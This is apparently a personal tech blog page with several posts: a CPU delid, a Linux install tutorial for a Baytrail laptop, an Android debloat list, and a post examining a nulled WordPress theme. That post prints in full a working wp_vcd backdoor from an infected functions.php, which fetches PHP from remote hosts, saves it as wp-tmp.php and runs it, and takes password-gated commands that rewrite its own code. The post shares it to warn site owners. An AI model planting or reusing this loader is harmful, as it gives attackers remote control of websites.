Saturday, May 25, 2019

Project Boost the Beast: i7 3770K Delid & Installation of Noctua DH-14

Well another project of mine , this time  we will be delidding i7 3770K , apply new thermal paste , replace original IHS with a custom 100% copper IHS and install Noctua DH-14.

What we will use: (Disable your adblock to see the items that'ive used and their links)














Temperatures comparison without any overclock: (Speedstep is enabled , thats why theres a difference when idle-ing to frequency)





Sunday, March 3, 2019

Microsoft Movie Maker on Windows 7 / 8 / 10



Missing the old good simple yet functional movie maker?

Download the microsoft essential package from the link below and install it , also if you get any errors for missing a .dll ,  copy the appropriate version inside the moviemaker installation path and it will fix it.

http://www.mediafire.com/file/09hnwobyy426o36/MovieMaker_Installation.rar/file

EINNOV IPCAMERA VIDEO MODE SETTINGS



If you have the same ip camera you will notice that if you try to change the video settings to configure better your RTSP/RTMP  , whenever you change something on video mode it wont save it.

A little bit of digging and examination revealed that there was a variable called nn that wasn't declared which makes it impossible for you to save any changes. Since it will always result in execution error: Undeclared Var.

I tried to contact the manufacturer through the seller , but they couldn't provide me with a fix(update firmware) so all i got was a refund.

Sunday, December 16, 2018

WordPress Theme Examination

Cracked , nulled , hacked and download for free are keywords/terms you should always avoid.
An examination of a NULLED THEME revealed some pretty NASTY and definitely FREE functions.
Before we proceed lets make-up a small story. We will use the name John and we will refer to a guy who's a website developer and "builds" wordpress websites for clients.

Another imaginary guy who we will name Frank will serve the role of the client on this example.

So lets summarize:
John creates websites , Frank wants to build a website , so he hires John.
John's goal is to make as much profit as possible.
So after discussing with the the client and sealing the deal , John decides to reduce the costs and increase his profit even more by downloading a cracked theme instead of buying it from a legitimate source. [and of course not letting the client know anything about it]

DON'T BE LIKE JOHN.

Results:
Malware Infected websites , blacklisted , compromised etc.


Tips for Clients like Frank:
If you decide to go with a wordpress theme and the developer is not someone you are 100% sure that hes not going to follow the same path that John did on the previous example just BUY yourself the wordpress theme and provide him with the .zip sources.

Below you will see a malware of John's EPIC work which basically infected all templates (functions.php and core.php). I manually removed all of the instances of the script(functions.php , wp-core.php , wp-tmp.php , wp-vcd.php) , checked all the recently modified files on the whole server and run at last a scan by AMSB.

Malware Details: https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution

An infected sample of functions.php file:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '10948a2cd002f84e83693c76f362cd1e'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
   {
   }
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='2967d26a5e5850cadd9eced25d5465fa';
        if (($tmpcontent = @file_get_contents("http://www.satots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.satots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.satots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 

        elseif ($tmpcontent = @file_get_contents("http://www.satots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

Sunday, October 28, 2018

Why i love what i do

# Project Name: MultiPager

Well i like to treat my projects/code/scripts/ideas as some thing a little bit more than just simple text lines.
Every bit of thinking energy i spent on even a typical [HELLO WORLD] hides something behind it way more than 34 chars. System.out.println("Hello World");

Hence why i'm writing this , while i was making a backup of my files i came across a source file (created 8 years ago) with the following code and all of a sudden , memories , feelings and a weird smile were fulfilling me. That source code had something more than just lines. Something deeper than a spaghetti code. It was a sum-up of an old idea with all of its pros & cons , expectations and memories of the whole process.
That is why i love what i do , and that is why everyday in my continuous learning journey i'm enjoying every part of it.
Every bit and byte.

That is the interpretation of a small project i've always had in mind since high-school which i've decided to post online as a blog rather than a repo. on github to preserve it as a memory.
Some KEY variables:
My high-school time dates back to 2009 => So if we put it in an equation:
NOW - THEN = 9 years ago.
Since then lots of things obv. have changed in matter of RAM , processing power , multiple monitor setups so basically the idea behind it applied to today standards doesn't really have any use.
BUT back then we were rocking (at least me) one VGA monitor and between 128-512mb of ram. So that basically sums up when and why the idea was born.

Functionality:
To be able to access multiple websites and being able to view/access them at the same time in one window. No tabs , no other windows. All the webpages inside one ~ (1024X768 was the most used monitor resolution)
Thats really what got me in to looking on how to create via javascript dynamically objects (in this scenario iframes and buttons in order to load the desired url destination in a small defined iframe inside my parent page).

Why the ship had sunk before it was ever created:

Well creating dynamically objects was very interesting as a task but then i came across the Cross-Origin policy which basically made me lose any interest into bringing-to-life the whole idea. I had the whole structure and some of the core functions implemented but in the end the journey was a great experience even though i didn't reach the destination.

Last but not least , it made me smile. An abandoned idea, 8 years after , gave me a moment , a flash back , and that's the value of it. It cannot be defined. A worth-less , priceless moment of joy.

<script language="JavaScript" type="text/javascript">
    var id = 0;
        <!-- Zoom Function-->
        function sliderChange(val)
        {
            var zoomlvl = val;
            if (val<80)
            {
                zoomlvl = 80;
            }

            // Use Ajax post to send the adjusted value to PHP or MySQL storage
            document.getElementById('sliderStatus').innerHTML = val + "%";
            document.body.style.zoom = zoomlvl + "%";
        }
    function frameremove()
    {
        var elem2 = document.getElementById('id');
        elem2.parentNode.removeChild(elem2)
        
        var elem3 = document.getElementById('id');
        elem3.parentNode.removeChild(elem3)
    }
    
    function makeFrame()
    {   //////////////////////////////////////////////////////////
        //Get the value from txtbox
        var webinput = document.getElementById('inputurl').value;
        /////////////////////////////////////////////////////////
        
        /////////////////////////////////////////////////////////
        //Create the iframe element
        ifrm = document.createElement("IFRAME");
        /////////////////////////////////////////////////////////
        
        //Error page that shows up on blank searches
        if (!webinput)
        {
            webinput = "test.html";
            ifrm.setAttribute("src",webinput);
            ifrm.setAttribute("id","id");
        }
        else //Normal Search Function
        {   
            //PROXY SERVER
            //ifrm.setAttribute("src","http://proxy2974.my-addr.org/myaddrproxy.php/http://" + webinput);
            ifrm.setAttribute("src",webinput);
            ifrm.setAttribute("id","id");
        }
        
        //////////////////////////////////////
        // IFRAME WIDTH & HEIGHT //
        /////////////////////////////////////
        ifrm.style.width = 600+"px";
        ifrm.style.height = 480+"px";
        var counter = 0;
        counter++;
        /////////////////////////////////////

        var beforeitem = document.getElementById('social');
        var main = document.getElementById('main');
        main.insertBefore(ifrm, main.beforeitem);
        
        ///////////////////////////////////////////////////////
        //Creation of the remove button
     btnremove = document.createElement("INPUT");
        btnremove.setAttribute("type","submit");
        btnremove.setAttribute("value","X");        
        btnremove.setAttribute("onClick","frameremove();");
        btnremove.setAttribute("id","id");
        btnremove.setAttribute("class","button");
        id = id+1;
        main.insertBefore(btnremove, main.beforeitem);
        document.getElementById('inputurl').value = ""
        ///////////////////////////////////////////////////////
    }
    
    function erase(html_id)
    {
        var elem = document.getElementById('btnadd');
        elem.parentNode.removeChild(elem)
        var main = document.getElementById('main');
        main.appendChild(elem);
    }

Saturday, July 14, 2018

[Tutorial]Linux x64 on Baytrail 32bit EFI(Lenovo Ideapad100s-11iby)

In this tutorial after some pretty "tough" trial&error series i'll show you step-by-step how i managed to get my Lenovo Ideapad 100S -11IBY laptop to successfully boot and install Linux Mint 19 XFCE.

The story behind it:
First thing first , low spec laptop + Windows 10 (Bloatware party) = Slowness.
Also this laptop comes up with pre-installed 32bit Windows10 version and with a 32bit UEFI bios making it a real pain to install an x64 bit os and take advantage of the x64 support of the cpu.

Laptop Specs:


      CPU: 1.33 GHz quad-core Intel Atom Z3735F (64bit support - hence the x64bit OS)  
      Graphics: Intel HD Graphics (Bay Trail)  
       RAM: 2GB  
       Storage: 32GB eMMC  
       Screen: 11.6-inch, 1,366 x 768 matte TN LED display  
      Connectivity: 802.11n Wi-Fi, Bluetooth 4.0 (Low Energy)  
      Weight: 2.2 pounds  Size: 11.5 x 7.95 x 0.69 inches (W X H X D)
  • What we will need:
    1) USB Stick
    2) Rufus
    3) x64 Linux Distro
    4) bootia32.efi

    Lets start:
    1) Burn the image to your usb stick using Rufus , copy-paste the bootia32.efi file inside your usb in the "/EFI/BOOT" directory.
    2) Disable Secure-Boot from your bios.
    3) Boot from your usb , (in Lenovo IDEAPAD 100S you have to press FN+F12)
    4) Select the first option to boot live distro 
    5) From the live linux desktop select the icon to install the OS to your harddrive.
    6) At the last step it will fail showing the following message
                                 
    7) Press okay , the installation will exit , find and open your terminal from the desktop environment.   Type: blkid and right down your partition name of ext4.
    8) After that restart your system.

    9) Boot again from live usb , on the first option instead of pressing enter press the "C" of your keyboard to launch the grub command.
    10) From there we need to jumpstart and point to our installation partition.


    set root=(hd?,?)              HINT: The TAB KEY IS YOUR FRIEND FOR AUTOCOMPLETION 

     Now we need to find the vmlinuz.efi file. Try with the tab to see where your file is ill give you the common locations below to search for it. (Could also be vmlinuz.efi instead of vmlinuz)

    linux /casper/vmlinuz root=/dev/YOURPARTITIONNAME 
    or
    linux /boot/vmlinuz root=/dev/YOURPARTITIONNAME 
    or
    linux /vmlinuz root=/dev/YOURPARTITIONNAME 

    Now lets locate initrd:
    initrd /casper/initrd.lz 
    or
    initrd /boot/initrd.lz

    And after that type "boot"
    boot

    So on your screen you should have these 4 instructions
    set root=(hd1,2)  
    linux /casper/vmlinuz root=/dev/mmcblk1p2
    initrd /casper/initrd.lz
    boot
    

    Your linux distro will boot-up and now we need to configure our 32bit grub loader and we are done.

    11)Open up your terminal and type the following:
    sudo apt-get update
    sudo apt-get install grub-efi-ia32
    sudo update-grub2
12)Thats all folks.The OS is now ready , time to sort-out some issues/bugs.

Sudden Freezing bug:This is a power management bug on baytrail cpus , there has been a patch which i havent really tried out yet (Google c6off+c7on.sh)

Instead of the patch ive used the following:


We will need to pass the parameter "intel_idle_max=1" to grub , for that go to /etc/default and edit the file called grub. Find the parameter GRUB_CMDLINE_LINUX_DEFAULT and paste inside the quotes with 1 space at the end of the current value the next parameter which is "intel_idle_max=1" e.g: GRUB_CMDLINE_LINUX_DEFAULT="quiet splash intel_idle_max=1" Save your file and then on terminal update the grub "sudo update-grub"

Disable HDMI sound (Known to cause issues):

Go to /etc/modprobe.d/ create a conf called "blacklist_snd_hdmi_lpe_audio.conf"
and inside it paste the following line without quotes "blacklist snd_hdmi_lpe_audio"

Drivers for Audio Built-In Speakers & Mic:

Find your sound card version by opening terminal and typing aplay-l
Go to https://github.com/plbossart/UCM and download the appropriate drivers , copy the whole folder to usr/share/alsa/ucm

Note: If your driver folder contains a file called asound.state copy it to /var/lib/alsa

Keyboard/Trackpad Session Freeze Bug:


This bug occured per session , and with some restarts or shutdowns everything worked until you shutdown your laptop again. The steps below completely fixed the issue for me and now the keyboard always work. Open terminal -> type sudo apt-get install libinput*

Power Management / Charging Issue / (Overheating):
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw

If you have a thinkpad you will also need the following line:
sudo apt-get install tp-smapi-dkms acpi-call-dkms

2 Network Icons showing up on taskbar:
From the main menu select Preferences > Default applications for LXSession. In the window that then appears, click on the Autostart tab, then find the network uncheck it , log off , log in , and then recheck it.

Some small tweaks for swap:

Tweaks for 2gb<= ram laptops
a. First check your current swappiness value.
Type in the terminal: cat /proc/sys/vm/swappiness P
ress Enter. The result will probably be 60.
b. To change the swappiness into a more sensible setting,
type in the terminal xed admin:///etc/sysctl.conf
Press Enter. Note that you'll be asked twice for your password.
Now a text file opens.
Scroll to the bottom of that text file and add your swappiness parameter to override the default
# Decrease swap usage to a more reasonable level vm.swappiness=10
c. Save and close the text file. Then reboot your computer.
d. After the reboot, check the new swappiness setting: Launch a terminal window.
Type: cat /proc/sys/vm/swappiness Press Enter. Now it should be 10.

                                                    HAPPY LINUX-ING


Friday, July 6, 2018

[Tutorial] Debloat - Safe android services to disable or remove.


Once again a self explanatory title so ill get directly the point.
Here's my safe to remove list , all self-tested.

Instructions:
To disable the following packages you can do it directly from your phone or download and install the Debloater by Gatesjunior with the adb drivers of course.



Samsung Galaxy Alpha G850F on Rooted Stock 5.0.1 Lollipop:
  1. AccuweatherPhone2014_S_LMR_HD.apk (com.sec.android.widgetapp.ap.hero.accuweather)
  2. Books.apk                                                     (com.google.android.apps.books)
  3. Drive.apk                                                      (com.google.android.apps.docs)
  4. Dropbox.apk                                                 (com.dropbox.android)
  5. Flipboard.apk                                                (flipboard.app)
  6. GalaxyApps_3xh.apk                                   (com.sec.android.app.samsungapps)
  7. Hangouts.apk                                                (com.google.android.talk)
  8. Magicshot_HD_A5.apk                                (com.arcsoft.magicshotstudio)
  9. Music2.apk                                                   (com.google.android.music)
  10. Newsstand.apk                                              (com.google.android.apps.magazines)
  11. PhotoStudio_HD_K.apk                               (com.sec.android.mimage.photoretouching)
  12. PlusOne.apk                                                  (com.google.android.apps.plus)
  13. SStudio_HD_K.apk                                      (com.sec.android.mimage.sstudio)
  14. Talkback.apk                                                 (com.google.android.marvin.talkback)
  15. Velvet.apk                                                     (com.google.android.googlequicksearchbox)
  16. VideoEditor_Lite_S.apk                               (com.sec.android.app.storycam)
  17. Videos.apk                                                    (com.google.android.videos)
  18. WeatherDaemon2014_LMR.apk                 (com.sec.android.daemonapp)
  19. Youtube.apk                                                 (com.google.android.youtube)